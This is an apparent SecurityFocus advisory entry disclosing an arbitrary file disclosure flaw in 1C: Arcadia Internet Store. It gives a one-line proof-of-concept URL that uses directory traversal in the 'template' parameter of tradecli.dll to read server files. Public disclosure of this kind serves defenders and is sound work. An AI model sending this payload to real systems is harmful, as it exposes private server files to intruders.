1C: Arcadia Internet Store Arbitrary File Disclosure Vulnerability

This example was provided by NERF Security gr0up:

Exploit: http://host/script/tradecli.dll?template=..\..\..\..\..\path\to\file


 

Privacy Statement
Copyright 2010, SecurityFocus